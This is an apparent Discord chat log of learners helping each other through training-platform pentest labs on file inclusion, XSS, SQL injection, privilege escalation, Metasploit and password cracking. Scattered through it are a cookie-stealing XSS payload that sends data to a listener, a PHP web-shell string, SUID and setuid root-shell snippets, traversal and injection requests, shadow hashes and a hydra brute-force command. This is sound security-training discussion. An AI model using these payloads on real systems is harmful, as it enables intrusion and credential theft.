#junior-pentester-path
1 messages · Page 17 of 1
Go to gtfobins (its a website). Search for the SUID enabled binary you found
It'll tell you how to use it
what q r u doing?
Metasploit: Exploitation
Someone said not to do that earlier I thought
What payload should I use?
ok am i being dumb? Linux PrivEsc task5, wget permission denied.....
You don't have write access to the directory you're in
omg
uhhhh
Hi! Short question: is anyone working on Jr. Pent Tester - Privilege Escalation - Linux PrivEsc at the moment? I just want to check if you encounter problems with the VM deployed for Task 6 ?
I completed all of linux prives without any vm issues
thanks @steel nymph @drifting drum
Gave +1 Rep to @steel nymph
Huh. Weird. Never seen that before
although with VPN + ssh I can connect to the IP that shows on the top of the room
I had same issue but you can still ssh
meterpreter/reverse_tcp?
Yes
same with me, but u can use ssh
thanks
Gave +1 Rep to @drifting drum
You can use all 3 of those to escalate
Gtfobins if you don't know how
Oh, ok ... just thought that the env_keep was a must to have on the machine
i got pass in base64 now i need to encode it?
quick question on LFI #2 (fileinc room)
- In this section, the developer decided to filter keywords to avoid disclosing sensitive information! The /etc/passwd file is being filtered. There are two possible methods to bypass the filter. First, by using the NullByte %00 or the current directory trick at the end of the filtered keyword /.. The exploit will be similar to http://webapp.thm/index.php?lang=/etc/passwd/. We could also use http://webapp.thm/index.php?lang=/etc/passwd .
What is the current directory trick? I searched in the previous section but couldn't find it. I'm not completely sure why it works.. is it related to php specific behavior?
u can read flag3 same way, if u know where it is
which way u did?
bunch of symbols when decoding
Sounds more like he's trying to read a binary file
$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:18796:0:99999:7:::
and where is base64
You have what you need lol
You're just trying to give too much in the answer
That too
I did see "You are not allowed to see source files!" with /etc/passwd as input, but not sure why adding /. at the end bypasses this
morning guys im already 2 days on file inclusion lab, can someone help me
probably cuz it helps not to add .php if u look at error
i need to use unshadow?
Does this error mean anything different or should I just restart the machine and do it again
on lab3 i found etc/passwd but i cant answer the question
what is the question?
Give Lab #3 a try to read /etc/passwd. What is the request look like?
still dont get it i got hash in base64 decode /etc/shadow,how can i make it in cleartext
im using nullbyte option
to decode a hash u dont need base64, try using other tools shown above
if u r able to read etc/passwd, how does ur url look like? ||<ip><answer>||
Argh it timed out again
stuck at file inclusion task 8, flag2, can someone help please ? - I am at the admin page at the moment
ah i understood now, so silly of me, thank you!!
Gave +1 Rep to @steel nymph
I guess the page doesn't explain how the developer "filters" the keyword? What does include(/etc/passwd/. mean? it's not pointing to a valid path, right?
I understand the nullbyte because there's a section explaining it
include("languages/../../../../../etc/passwd%00".".php"); which is equivalent to → include("languages/../../../../../etc/passwd");
i cant get the etc/passwd anymore
u can send me screenshot what u have done so far
private ou here?
private, dont spoil
can anyone help me with crontab, i configured, but cant have reverse shell
still no change
yes
copied from example above
but with my own ip and port number
i think connection problem, restarting
For the last section of https://tryhackme.com/room/metasploitexploitation , I made a payload, and I'm trying to run it on the target, I got the file via wget, and I am root, but it says bash: permission denied when I try to run it. I'm assuming the correct way to run it is just with ./payload_name?
I cant use telnet properly
Oh...
I just ran it after doing chmod +x, and it still did not work, and it looks like this
Was I supposed to do something other than -f raw > shell.elf to export it from msfvenom?
Wait I'm dumb
did that
Hey, in the room: Cross-site Scripting Task 8 Practical Example (Blind XSS) I am able to capture cookie via THM Request Catcher, but I cant catch cookie with netcat. I am doing it with code:
</textarea><script>fetch('http://tun0IP:9001?cookie=' + btoa(document.cookie) );</script>
then I wait but netcat returns nothing, can someone help with this one ?
nvm netcat, go with the site
I used linux/x64/meterpreter/reverse_tcp
same problem
is it linux machine or windows?
You mean the target? Linux
yes, oh ok
I need help with task 3
I am connecting with telnet
and whats the problem?
Yes, could be use to hack you
do you need help with the xss lab?
try again, if stuck, ask back again
can someone help for the Linux PrivEsc room > task 9; the cronjob does not want to give me revshell
thanks will try
Gave +1 Rep to @steel nymph
worked thanks!
damn
how do I know if its staged or not
oh
well yes, but I get this when I execute ./shell.elf on the target
Look at the name of the payload. Meterpreter/reverse_tcp is staged. Meterpreter_reverse_tcp is not staged
oh thanks
staged has "/", stageless has "_"
I need to understand something on linux privesc task 7:
||I see that base64 has suid and owned by root, so why can't I still run it as root?||
oh this is probably guid?
i mean SGID
so as I understand I should be able to run them with sudo
or that I run them without sudo and they will act as sudo
oh yikes
so why all the gtfobins suid vulns are with sudo
Be very careful with how you're using the word "sudo"
sudo is a command that lets you run commands as other users, usually root.
Code running as root isn't acting as sudo
so sudo has nothing to do with this specific task, I just need to find the right suid vuln
yea I read and it was about nano example however this time I'll use something else probably
cause I checked like 2 commands and none worked yet so I thought that maybe I missed something
why the fcuk does my terminal freezes whenever i try to interact with my fcuking nfs mount !
I'm probably goin to break this fcukin shit of PC now!
having problem with nfs, i run the ||./nfs||, but its not giving me root
any suggestions?
did u mount?
u gave perms?
yes, can see shared files
yes I have definitely missed something
is it an suid?
yes, can execute, but still ||karen||
send ss
yes
||I copied the bin file and run it as karen instead running at /usr/bin/...||
wait how do I spoiler inside a command lol
||its super id||
inside a message
i hope u made the suid in your machine as root
i did
what's your code
cool tnx
coz this is all u need
same
showmount -e ip u did this right? and checked the shared dirs
show me your mount command
||yes, i have shared directory, i have my scrips compiled, i gave permissions and i did run from karen, but all it changed was "$ ./nfs
karen@ip-10-10-242-0:/tmp$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
" ||
send ss
||-rwsr-sr-x 1 ubuntu ubuntu 16144 Oct 24 20:59 nfs||
created a mount directory in your local machine
mount -o rw ip:/target_mount /local_mount
created the malicious file in local mount and gave suid perms
executed it in the target machine
make sure u follow the same ! no ups no downs
yeah, i did same
be sure to delete that file when you are done... you don't want a suid bash on your own system
@visual crest why the hell is my terminal freezing? Guess what! i haven't been able to complete the NFS room yet! this just won't let me do
did you try the attack box?
the onely change is from $ to ||karen@ip||
yeah! but sadly 1hr over
and i was at 97%
close everything ! make a fresh start
I'm not sure why it freezes
yes I think I had the switch I needed, I remember I learned suid once in the past and didn't understand nothing
well it was on the past when I really didn't understand nothing about this world lol
now things are better
and made this task tnx
suid are simple! they just help you escalate to a higher privilege. For example, you want to buy the latest game that's yet to be released. But u want it badly. So u enumerate among your relatives lol..And u found out that your father's friend is the head of the game company. And guess what! u can literally just get the game for free 
sorry to interrupt with another room.. web-xss the blind-xss part. other users above already posted the same problem with not receiving the http request. I think it's because of ||CORS|| . I got the cookie with another trick, but was wondering ... what is the intended way to solve? And shouldn't the room talk about this as well?
Lol there's a little more to it than that. SUID is a permission that can be set on files. When the SUID bit is enabled, the file will run with the permissions of the user who created it. So if you find an SUID file, usually you can find some way to exploit it to escalate your privileges to the user who wrote the file
yeah! just let it be a small example lol
Yea
one of the simplest examples I've heard
do the crontabs running every minute?
because there is a file on the crontab ||/home/karen/backup.sh|| that should run as root, and I've setup ||rev shell for the connection and copied the command (ofc changed the ip and port) from the task should I wait any longer it has been 8 minutes ||
wait maybe I forgot something
maybe || execution prevs were missing? ||
lets wait a minute
yes
exactly
thanks
sometimes I just need to explain what I did to someone and I figure it out, on work I have my co-workers for that lol
i'm just goin the break my motherboard today Hope it rests in peace
did anyone write a program for sql blind time-based attack in Go?
Anyone having problem with Passive Reconnaissance room? I know I'm putting in the right answer and it keeps telling me it's incorrect! But there's only 1 name server sooooo.....
for walking an application, i've placed the correct flag for the network task, but it says it's incorrect
okay so we're sorta in the same boat there. Do we reach out to the dev team at this point?
hmm
maybe we should try in different browsers??
ima try
Hey, I am in the middle of mike myer's network+ prep course but I'm not planning on getting the cert, does TryHackMe teach you enough about networking for pentesting or should I finish the course first?
I've never taken any networking courses and I'm doing just fine
But it all depends on how you learn
@steel nymph under the WhoIs task the last question regarding the name server. Should be cloudfare.com
u did misspelling maybe?
like letter "l"
I copied and pasted that badboy too though
cloudfare or cloudflare?
But do you think tryhackme teaches you enough about it as a beginner? or is it missing some stuff?
does database name for blind time-based sqli is ||s_l__fou_|| or my script is broken ?
Again it depends on how you learn. I do a lot of research while I'm learning. So tryhackme taught me some stuff and I learned more about it on my own. I can't tell you if it'll be enough for you it depends on you
That's wrong
Very wrong
for walking an application, i've placed the correct flag for the network task, but it says it's incorrect
Alright, thanks.
Gave +1 Rep to @drifting drum
Then you don't have the right flag
hmm
show what u wrote with spoilers
lol, now its writing something different
it takes longer to boot windows than exploit it here at the finish line lol!!! Great track though. Learned a ton!
can anyone help me crack shadow hash, attack machine taking so much time
im using rockyou
yes
yes
i copy pasted
oh so close
copy this part, then save it to a file, hash.txt, then run this command, john hash.txt
i did
use john default wordlist
||$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51||
i manually typed this on page and it was returning with delay
tested to add next letter but no result
capstone challenge of lin privesc
im running both hashcat and john, taking long time
i think this hash has a problem i solved this room one hour ago but it didn't take that much time
missy's hash only
I think the privesc room is the best room by far
let me try
||you got missy password?||
yes
privesc from ||missy||
anyone got a second to help me with file inclusion task 4 question 2. Guess i dont understand what it wants for the directory
only windows privesc and I'm officially jr pen tester!
thought I would get any voucher :/
yeah is it wanting something like the var/www/html or am i totally missing something else?
You see the hint ?
it tells you in the include function, there is a directory name
ok ill keep hammering at it
thanks everyone, i got it
Ok lol.. it's still wrong
in task 7 linux privesc got error when using ./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Error detected while processing command line:
E319: Sorry, the command is not available in this version:
Dumb question on the Burp module:
...expand the various levels of the application directory. What do we call this representation of the collective web application?
answer: xxxx xxx
https://tryhackme.com/room/rpburpsuite (seems dumb because I'm sure I could figure it out but don't want to bother now and have already tried things like HTTP GET, root/home dir, HTML DOM, etc.)
I think it's asking about an agnostic term, not specific for the exercise.
Oh, woops. it's part of the CompTIA Pentest+ path.
Task = Target Definition, my bad. First time asking for help here. Just joined and trynna blow through all the THM paths.
oh
got it. 
since most answers are super simple for these rooms I knew it was something i was missing....maybe it's time for another slice of
Also, my b if this was the wrong channel. seems jr pentester is diff from comptia one.
Hello I'm stuck in on task 6 of subdomain enumeration using ffuf.
I've tried searching here for the same issues and people have said to restart the attackbox, I have and I am still getting this. is this supposed to be correct?
I get a bunch of these:
:: Progress: [1907/1907] :: Job [1/1] :: 322 req/sec :: Duration: [0:00:06] :: Ezw [Status: 405, Size: 472, Words: 98, Lines: 15]
:: Progress: [1907/1907] :: Job [1/1] :: 323 req/sec :: Duration: [0:00:06] :: Ezlog [Status: 405, Size: 472, Words: 98, Lines: 15]
:: Progress: [1907/1907] :: Job [1/1] :: 323 req/sec :: Duration: [0:00:06] :: E:: Progress: [1907/1907] :: Job [1/1] :: 324 req/sec :: Duration: [0:00:06] :: E:: Progress: [1907/1907] :: Job [1/1] :: 324 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
LFI task 4 last question im stuck.
See this example picture
got it with view tnx
check the error message you get, the answer is right there
lab2.php didnt work
Guys, in file inclusion task 8, flag3, i see the / incrementing everytime we do a trial and error, am i missing anything major here ?
No
that is not the directory
wow nvm..lol
i thought redline was driving me crazy, file inclusion is higher than that
how do i get the pentester role?
three tickets with the pentester title, if you want in discord, you need to link your discord token from thm and register that to the thm bot
nah
oh good
can someone give me an direction on how to get RCE on the playground. i tried adding <? php system($_GET['cmd']); ?> to the user agent to see if i would be able to run commands but didnt work out
Or just send !verify <token> again to the bot
am i on the right track?
can anyone help me in burp suite section?
the form action in for the task 8 challenge three has been set as .//chall3.php, is that why everytime we do a trial and error, the / increments ?
i have an issue with Windows privesc room > Task 6 Unquoted Service Path > last question where i should obtain Administrator privileges, when i get to the final point to restart the service it won't start. Any advice, hints?
try net start unquotedsvc, I finished that room yesterday so i might be wrong
dang these privesc rooms are intense bro, so long
the first 95% of the path didn't take as long as these 2 modules
i need some help for task 8 SQL Injection room, so far i found database, table and column name how can i find the password
||TABLE_SCHEMA='sqli_four' and TABLE_NAME='users'|| is this the right table?
yeah - also i think you're supposed to put the spoiler tag things on. You're on the right path just keep enumerating other column names
oh ok and how to put spoiler tag things on?
||test||
oh thanks
Gave +1 Rep to @tulip elm
once you have the column and need the specific password, this command from the previous boolean section will help: admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
Thanks, i tried this and netcat listener on the other side, and finished the room! Though it still wrote that service Failed to start, i saw i got a connection back and searched for flag location.
Gave +1 Rep to @cobalt skiff
were you able to find a solution? I have the same issue been like this for two days, tried restarted the attackbox many times
no. I even made a post on the community forum for that path. I'm hoping I get an answer once the week starts.
oh i see thank you. Please keep us updated. this stinks for us
Gave +1 Rep to @acoustic spindle
anyone know what that Robocop thing means?
I'll make sure to come back and let you know either way
Can anyone help me here ? Topic: File Inclusion Task 8 flag 2 hints to check the cookies, which I modified to admin and got this page.
I am not understanding what should be the path here
You're getting there. Play with the cookie more
I am* confused.......lol !
I am not getting the right path
That's where I am going wrong.
Right ?
Idk. What have you tried?
/challenges/chall2.php?file=../../../etc/flag2
that's what I tried
Also I modified path with different types
You didn't listen to what I said lol. Keep playing with the cookie
Combine your answers. Thats all I can say. Anything else would be giving it away
Thank you @drifting drum
Gave +1 Rep to @drifting drum
wooo I did it!
I figured it out. What I did is start the next room while I waited. Started the attack box there. there are two ips, you have to use the 2nd ip, not the first one at the very top, but the one on top of the task 1 that says "active machine information"
I ended up finishing the new room first then went back and finished up the prior room using the same ip even though I started a new attack box again in the prior room. (ip didn't change)
see above #junior-pentester-path message
basically you want to look in the directory /assets
anyone could help me with command injection...task 5....2 question...find the flag content...cat does not seem to work
did u forget shell operators?
hey there...i managed to crack this...tx
Okay i really learned a lot about nmap with the NetSec Challenge really liked that.
Getting 502 bad gateway accessing file inclusion lab.
It's pretty easy, you don't have to use an exploit, just do a directory traversal
Is it just me who's finding the sqli room really confusing?
It's all there in the examples. I don't think it's confusing. I would go as far to say I found it the easiest in that section.
Which part is hard?
Probably just me then
Lol I don't know. Some others have posted questions about it.
super noob question here, I tried curl and it worked, but why did it work on curl but not on dev tools or burp, it's the same exact step, really appreciate if you can tell me why, thanks
Gave +1 Rep to @deft valley
hii can some one tell me how one can exploit a bin file when they are not part of sudoers
i cant run a gtfobin exploit because iam not part of SUDOERS list on that machine
Hello Guys in Linux PrivEsc TASK 7 I figured out SUID ||base64|| and got passwords for user2 and gerryconway and enumerated them but I am not sure where to go from here. Can anyone please nudge me in right direction
Did you type ||sudo -l|| to see what you can run?
did you black that out or it gets blacked out?
i have found out what files have SUID bits set for the user
and i have searched for them in GTFObins but all that i have found need sudo permission to run them
Ok.
and that user is not in the sudoers list to do so
What task are you on,?
linux privsec
Which number ?
task 7
Which task and which question are you talking about?
Local File Inclusion challenge 1
And how is the request that's not working in burp looking like, you have a screenshot?
have you completed it by any chance??
Any ideas why acme it supports website refuses to load in Content discovery room
Nah I thought you were on an earlier one
Okay, got your screenshot, could you also show me the curl request you made? I mean I already see why it's not working, but would be interested in how your curl request looks like
but it's showing that answer is incorrect
it's right below the burp screenshot
c2Vzc2lvbj04OGE1ZTZhZjVhYWE4YWM0ZDliYTllY2U0NjAxY2NhYg== this is the base64 value
session=88a5e6af5aaa8ac4d9ba9ece4601ccab this is the decoded value
still it's showing incorrect
Oh, it's so small I didn't see it, but it seems to be cut off? So I can't see the full request. Did you not put any header in that curl request?
that's all of it
Okay, so my assumption is that curl by using the post request by default will set the header to Content-Type: application/x-www-form-urlencoded so if you add that to your burp request it should work.
thank you very much, I would try it later.
Gave +1 Rep to @shadow echo
I got a different one. What did you try? (you are talking about XSS-last task?)
(feel free to PM if you want)
Yes buddy
Do not try to do it in ur local machine, do it in ur attackbox
I too took help of one of my friend where he just wasted 3 hrs for this things
Thing*
@hazy kraken
Where attackbox or local machine ?
local. starting attack box to try it there.
Yes do it on attackbox close that connection, its of no use
For this task, u need to do it using attackbox, to grab the right staff session cookie
And then just decode the base64 value to know the answer
I somehow doubt that it's only working with the attackbox
it works in both machines for me (yet none of them works using the HTTP request)
Try it urself and u will come to know
Hi, im working my way through File Inclusion room and have no clue how to get flag3 in task8. If anyone could give me a clue it would be great. Currently I still can't include any special characters
Well @hazy kraken already confirmed that it's working for him on either attackbox or local. But ye, will come back to you when I did that task
you already learned the trick before
I mean both the cases provided me the session, but the right session was given by attackbox
Session cookie*
Im pretty sure I tried every technique mentioned in the previous tasks
hmm. I cannot find the specific task right now. did you try/think about all 4 entry points mentioned in this "Steps for testing for LFI"?
Did try other HTTP request methods, changing some values of http headers, different ways to include path, looked through errors and did all of that with burp to exclude possibility of it being front-end filter
I'm having some trouble getting the reverse shell to work on the crontab task of linux privesc. I've tried the commands listed in all the cronjobs, but I'm not getting any response.
let me try it myself again. ||request method|| should be the one to go with.
Alright, gonna try work on this a bit more, thanks
Gave +1 Rep to @hazy kraken
Need help please: File Inclusion - Task 8 -Flag1
In firefox dev tools, under network tab I am editing and resending the request. I have changed the method to POST. This is my query string **file=/../../../../etc/flag1**. I have tried using null bytes %00 and character escaping. I have tried variations on the query string, yet no joy. Thanks
I'm trying to use post/windows/gather/enum_domains, after getting a meterpreter session on the target machine of https://tryhackme.com/room/meterpreter, but when I try to run it, I get this error
What do your request headers look like in the dev tools?
how do you look at the crontab? you should find a job with a script you can modify if I recall correctly
alright. got it back working. how did you try the ||POST|| requests? Maybe I can hint you in the direction.
You want to make sure to have the Content-Type: application/x-www-form-urlencoded header set in your request.
I have found all the scripts using cat /etc/crontab and modified all of the available ones using the example script in the explanation. I have even tried manually running the script to verify connection. For some reason I cannot get the cron jobs to work.
what did I do wrong this time
what about rechecking payload and module both
Okay, thankyou! I'll give it a go. Am I close?
Yes
hm?
chmod maybe, typo in the name?
||file=....//....//....//etc/./flag3 included in path and body||
close. but let's assume the source looks similar to this ||if (not_valid($_GET['file'])) { $path = filter($_GET['file']); } else { $path = $_REQUEST['file']; } access($path.".php");||
ah and did you also put Content-Type (just like Fontaene mentioned above for a different task?)
Oh god, missing header was the issue, thank you soo much ive been stuck there for a while
Gave +1 Rep to @hazy kraken
np.always the small details I used curl which automatically takes care of this header
Oh i had no idea curl does that, that's great to know
what do you mean?
Yeah. I get the same issue. Doesn't accept the base 64 decoded cookie
I've added Content-Type: application/x-www-form-urlencoded in the header, and then gone through the process again with all variations of file path as mentioned previously but no luck. Any other clues?
And thanks @shadow echo for the help
Gave +1 Rep to @shadow echo
Well you might want to verify your THM account in discord in order to be able to send screenshots, so it will be easier to help you.
!docs veriy
!docs verify
Done. Should I dm you?
No you can just paste the screenshot from the request which is not working in here.
this is so dumb
bruh
I have every other answer except this question
relook at ur url/query @vital depot
I don't even really care at this point, if you wanna just tell me the answer go ahead
I have spent like over 4 hours on the metasploit modules
Ooops. Yea tried it previously with the correct amount of ..'s in the path and that didn't work either
You have to background the meterpreter shell first
ctrl+z
I did that
Tried doing that and it killed the meterpreter session
First of all I would get rid of the ?=file (and everything after that) in your URL as you are not making a GET request
Hi, for linux privEsc task 6, “what is the hash of Frank’s password”. Is it in the etc/shadow ? Anyone can share how get the permissions? It shows “user Karen is not allowed to execute ‘usr/bin/cat /etc/shadow’ as root on ip*******
You're meant to escalate your privileges to root then you can read the hash which is the whole point.
I'm not sure what to do in that case, sorry.
sudo -l
Is this for the LFI room task 8 challenge 1?
Yes
Are you meant to use Burp Suite with a GET request? I tried the same to no avail.
So SutterCane is using the dev tools right now, but either way the challenge says you have to make a POST request, so a GET request will not work.
Oh yeah I meant a POST request. Did it with burp yesterday and had no response on the website sadly
Hi! Any extra hints for Linux PrivEsc task 10? created the "path" file and the thm in /tmp but after running "path" it does not return an elevated shell ....
Well if you send a screenshot of your POST request in burp I can let you know where the issue is.
iirc, you need to write on a file that's already writable
or make a file on the writable dir
where u can write files
anyone else know? using WSL2 if that makes a difference
find / -writable 2> /dev/null did u do this?
I did ... on /tmp, created the "thm" file and echoed /bin/dash on it
yes
Hi I am stuck at the JR Penetration Tester path at Introduction to Web Hacking File Inclusion. Task 4 Local File Inclusion - LFI. The last question they ask that: "In Lab#2, what is the directory specified in the include function?". I dont understand what they want me 2 do i tried everything, checked for write-ups which i cant find. I think the answer is very easy but I cant figure it out. Is there anyone who can give me a hint?
hint : /home/murdoch
already there - running "path" file from there
should i share my notes?
or just more hints
you can share your notes but on a DM - so we will not spoil the fun for the others?
oh okay
Have you entered an invalid input and checked the error/warning messages?
Did you change your path?
Yes I did, i get 2 warnings tried typing parts of the warning but didnt work
So in the example above include("languages/". $_GET['lang']); the developer specified to use the languages directory for his include. So regarding to that, check the warning again to see which directory is specified for the last question of that task.
do you use Lab#2 or still in Lab#1?
@north dove gave me a good idea that I never thought of - it worked like a charm! Thank You!
Gave +1 Rep to @drifting drum
Found the answer, thank you!
Gave +1 Rep to @shadow echo
at this point anyone that knows the answer to this question of https://tryhackme.com/room/meterpreter DM me with the answer
i am done with this
lol
keep trying
Literally been doing this one question for 2 hours now
just 2hrs?
And I keep getting the same error
lol
is there any paragraph before
send that please
i can't access the room. I'm not a subscriber
oh
well the hint says ||Use the "post/windows/gather/enum_domain" module. You will need to background Meterpreter first and set the SESSION parameter.||
but this is really annoying because I don't know if I'm doing something wrong or there's another problem
if you don't mind can you send the whole page ss? lol!
Probably impossible to read but here
lol! i'm tryin
If you click open original it's kinda readable
send the qn
Have you tried to do the question on the attackbox in order to check if there is an issue with your operating system or if you are simply doing something wrong?
well I guess I could do that
is there any other module apart from this?
no idea
check up
As you are doing a POST request, the parameter doesn't belong to the requested URL. So therefore you first of all have to get rid of the ?file= (and everything after that, except the HTTP/1.1) and put the requested parameter in the right place. Also you will have to specify the correct Content-Type in your header.
I have the answer but I still fail to understand it, the function is include("languages/". $_GET['lang']); how come that in the error it says the directory is includes? shouldnt this be languages/ ?
Congooooooooooooooooooooo!
No why? The developer can name the directory to anything he wants. If he names the directory banana then that would be the answer.
But the error gives back what you input into the function right? and the input is languages/ shouldnt you see that back in the error?
Well the error gives back what directory is specified in the include function. So as you have found the correct answer now, that's exactly what happened. The above code with include("languages/". $_GET['lang']); is just an example. So if I'm the developer and I named my directory banana, then my include function would look like that include("banana/". $_GET['lang']); and the error would reveal that.
Anybody finish Task 6 in https://tryhackme.com/room/protocolsandservers2 ?
Yeah, what's the problem?
Ended up with this. Not sure where the parameter is meant to go though.
ooooh it's an example lol i thought it was the back-end code
Not sure which wordlist to use tried several and no dice EDIT: Was tired and put wrong IP RIP
rockyou would do the job
I need a hint for the XSS room, task 8.
Even if I set a netcat listener, even if i use that website to get the requests, I still get my cookie instead of staff cookie.
Is it the payload or am I overthinking it?
So in burp if you manually want to add the parameter, it belongs under the headers with 1 new line between. So in your case it would belong into line 12 with file=/etc/flag1 (just an example, not the right path)
But you could for example edit the initial request in the dev tools, make it a post request, add the file=/etc/flag1 in the request body and then capture it in burp, so that you'll see where the parameter goes.
That seems much easier, thanks.
Gave +1 Rep to @shadow echo
Not a problem, let me know if you are still stuck after that.
So, anyone any ideas for the task 8, XSS room?
I'm getting my own cookie instead of staff.
Not quite sure how to edit requests in devtools though.
Are you on firefox?
Yes
Then you go into the network tab, send the initial request, then you should see it in that tab and simply right click it and click "edit and resend"
Can someone help me with the command injection task 5
This is beyond frustrating. I am dumb
@vital depot same bro but going forward
some of the payloads from here will do the job @loud spire
see which one allows you to bypass the filters and read from the file.
I have tried it, it's working but i need to go /home/tryhackme
Most of the payloads are working from payloadbox but the thing is i am unable to traverse
Not working
Just saying not working isn't helpful
What payload are you trying right now?
What have you tried that isn't working?
See, i passed the payloadbox cheatsheet to intruder and i can see that some of them are producing the desired output, but the thing is i need to navigate to the directory /home/tryhackme and i am unable to do so
why to intruder?
again, why you need to traverse directories?
just use a payload that allows you to run a command
and use it to run whoami and cat
See cat /home/tryhackme/flag.txt isn't working
Whoami runs
Successfully
I need to cat to read flag
what payload are u using?
Tight. I've hit a road block myself.. for two days. I'm trying to contain myself ha
What should i do give ne some hint
try inserting the payload directly into the web
or follow the response in burp if you want to do it that way
the payload you're using it's working fine. just go to http://machineip and insert it there.
I'm going to grab something to eat. Lemme know if you got it working @loud spire
Can't get the structure, right?
Hello, I'm in Linux PrivEsc room task 11 (NFS), I followed exactly what exists in the text but I didn't get the root. Why?
Nuh uh. I've tried looking for POST request url examples so I'm not using ?file= in the url, but to no avail.
I could send you mine?
Tempting.. might just bang my head against this wall for a little longer. I'd take a hint though if I send you my query string?
Post it here. Just spoiler tag it
It's not really about strings. It's about formatting.
Yea, sorry I'm just referring to it in the context of the Query String box in dev tools
Hey, anyone having issues with the NMAP live host discovery TASK 2 view site option?
the view site option opens up a network diagram of a subnet. we are expected to select the TO and FROM machines and then select the PACKET TYPE and send the packet. This doesn't work :/
I reverted back to using ?file= ... I know that's not correct but nothing else has worked
it just doesn't do anything
My dev tools don't have that so I had to use burp
LFI has been the one room that has given me trouble ngl
yep. neither does task 4.
done that. just annoying. probably try to open a new session
woah that worked lol. nvm. Thanks @steel nymph
Gave +1 Rep to @steel nymph
It should be file=inclusion goes here
Still no dice
I tried null bytes too, but that wasn't having it
my vm won't load any webpages.. first time using a vm so I'm not sure what to do
thank you
Gave +1 Rep to @steel nymph
sorry to ask but are you unable to do it in the firefox debugger tool?
Yep
Mate, thank you ffs haha
Gave +1 Rep to @steel nymph
int main()
{ setgid();
setuid();
system("/bin/bash");
return 0;
}
For sure. It was worth it. Even for the tiny steps
this jr pentester path is just top notch
Thanks @tame fern for the help too
You need to put 0 in the parentheses after setuid and setgid. That code is setting your user and group ID equal to that of another user. You want to be root, so you set it to 0 because that's the root gid and uid
okay i read back and still couldn't understand im stuck on file inclusion task 4 question 2
In Lab #2, what is the directory specified in the include function?
yes
What do you mean exactly? i have the same problem i edited the GET to POST and resend it. Then i look for the response in the network tab but i dont see any change
so the goal isnt to find a file ?
Thank you
Gave +1 Rep to @steel nymph
the goal is to identify the directory. if that is the same task you mentioned earlier
the include_path is the directory specified in the include function
maybe share a screenshot here of the error you see?
im very new
has anybody had issues logging into to the Windows Priv esc box? I've been getting errors for about the last hour
but this is lab1
okay then im lost
@vital depot How did you solve your POST request problem? i double clicked, opened new tab etc but it wont help and i have no experience with burp suite just took a look at that
go back to home, select lab2 and then enter a file name and see what you get
oh yeah im dumb
You can also do it with the dev tools in firefox, so no need for burp
For flag1? Can you post a screenshot of your dev tools request?
@vital depot
Can you right click on that request, edit it, and send a shot of the whole request window?
in the dev tools, you can inspect the webpage, then check the code where the form section is present, modify the METHOD type to POST, in the place where you have to add the file name, modify the source code with a value: "?file=add the file path here"
hi guys, I have trouble with the repeater exercise (burp), i send the request with the product modified to 1000 or a symbol, but the response is always a 404 not found, and i can't achieve the 500 error required for the answer, can anyone help here?
you can try a negative value
try a negative value
@vital depot
@twilit yoke include Content-Type: ||application/x-www-form-urlencoded|| in the Request Header, and file path payload in the Request Body. I didn't include the exclamation like @subtle forge suggested, but it worked. So I guess either will
its a POST request so you might have to enter the file path in the body of the request
you deserve some drink bro, thanks a lot
Gave +1 Rep to @somber mulch
Thanks Buddy ... tried hard enough ..
Gave +1 Rep to @acoustic python
wow i get it now, thanks alot @vital depot @subtle forge
Gave +1 Rep to @vital depot
nvm
Cool man
glad to help! just started with THM 4 days ago and I am lovin it!
Did you already finish the Junior Pentest path?
nope. currently on Network Sec
are you able to do telnet portion?
In the beginning it goes very fast but now i've noticed it takes more time to complete rooms
which task are you referring to?
Protocols and Servers
Task 3
HTTP portion, i logged into telnet port 80 and Http request it
oh no. havent reached there yet
sorry
things are getting harder
Np!
RFI capstone has to be the easiest bit of the LFI room
anyone know how long the passwords should take to crack? I'm at try 2000 with hydra and rockyou wordlist https://tryhackme.com/room/netsecchallenge
-t 64 as well and its taking a while
I guess ill just wait
it shouldn't have taken that much time
Which port do you use? ftp? Which port is the ftp service listening on?
That's right. Shouldn't take too long.
it says it's gonna take 342 minutes lmao
Took only a few seconds to find passwords of both users
hmm
Should be a little less than a minute for both.
Try ftp://IPADDRESS:10021
If they take longer then something's wrong.
Worked pretty well for me
Pretty sure port isn't the flag you should be using. Look at the manual.
I'm not using the flag "port", I was using -S
Got it
When I login with FTP should I just use ls -a to find the flag?
@wanton prism same here. I did the ' OR 1=1;-- statement and I am able to go to level 3 task, but flag is the same as was in Task 5. Did you manage to get right flag for Task 6 ?
Hah, you just need to click Level 3, and correct flag will pop out.
i absolutely hate file inclusion

why does the challenge 3 request work with forward through proxy but not when using Burp's repeater? can someone explain because im struggling to understand and I've wasted so much time spamming the same request through the repeater
hmmm I'm at attempt 26000 of the quinn user 
using the exact same command that worked with the eddie user but obviously with quinn instead of eddie
||POST /challenges/chall3.php HTTP/1.1
Host: 10.10.101.220
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://10.10.101.220
DNT: 1
Connection: close
Referer: http://10.10.101.220/challenges/chall3.php
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
file=../../../etc/flag3%00||
ive been trying this all day already
and then ive asked @burnt orchid for help and then they told me theyve used the same, but i should try it with a direct proxy request forward and then it suddenly worked.
Anyone want to team up for burpsuite or networksecurity?
The repeater request works too. why tho? ive been jumping so many machines because i took so long they always expired
hdym? it worked
nope
location of chall3.php doesnt count as it is the origin

this can't be right
I'm at attempt 55000
is this command correct? || hydra -l quinn -P /usr/share/wordlists/rockyou.txt ftp://10.10.52.232:10021 -t 64 -V||
can someone help me with local file inclusion?
why is this wrronggg?
why is this wrong?
This one worked for me but I used less info on POST
